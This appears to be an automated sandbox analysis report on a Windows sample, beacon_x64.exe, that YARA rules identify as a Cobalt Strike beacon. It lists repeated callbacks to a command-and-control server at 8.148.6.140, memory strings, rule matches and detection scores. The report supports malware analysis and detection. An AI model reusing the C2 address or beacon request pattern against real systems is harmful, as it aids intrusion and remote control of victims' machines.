    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
    Source: beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get
    Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get#
    Source: beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get%
    Source: beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get&
    Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3069577014.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get(
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get140/api/v1/get
    Source: beacon_x64.exe, 00000000.00000003.3086750899.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get2
    Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get4
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get6666j
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get6666u
    Source: beacon_x64.exe, 00000000.00000003.3004099013.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get8
    Source: beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/get=
    Source: beacon_x64.exe, 00000000.00000003.2910089243.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getH
    Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getJ
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getL
    Source: beacon_x64.exe, 00000000.00000003.2836169500.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getP
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getSOR_A
    Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getX
    Source: beacon_x64.exe, 00000000.00000003.2435393695.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getbd06
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getd
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getem32
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/geth
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getl
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2993012953.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.2982082108.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getll
    Source: beacon_x64.exe, 00000000.00000003.2970472525.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getll;
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getllue
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getlp
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000857000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000002.4562753619.000000000081C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getocal
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getp
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getstem32
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getue
    Source: beacon_x64.exe, 00000000.00000002.4562753619.0000000000872000.00000004.00000020.00020000.00000000.sdmp, beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/gety
    Source: beacon_x64.exe, 00000000.00000003.3459929835.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.148.6.140/api/v1/getya

    System Summary

    barindex
    Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
    Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
    Source: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0077C1C8 NtAllocateVirtualMemory,0_2_0077C1C8
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0077C2EC NtFreeVirtualMemory,0_2_0077C2EC
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0077C3B8 NtProtectVirtualMemory,0_2_0077C3B8
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0077F1A80_2_0077F1A8
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0078C2800_2_0078C280
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00776B380_2_00776B38
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_0078CBF00_2_0078CBF0
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_007815280_2_00781528
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00780E640_2_00780E64
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00781F9C0_2_00781F9C
    Source: C:\Users\user\Desktop\beacon_x64.exeCode function: 0_2_00CB00000_2_00CB0000
    Source: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
    Source: 00000000.00000003.2114029429.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
    Source: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
    Source: beacon_x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\beacon_x64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: beacon_x64.exeReversingLabs: Detection: 84%
    Source: beacon_x64.exeVirustotal: Detection: 79%
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\beacon_x64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
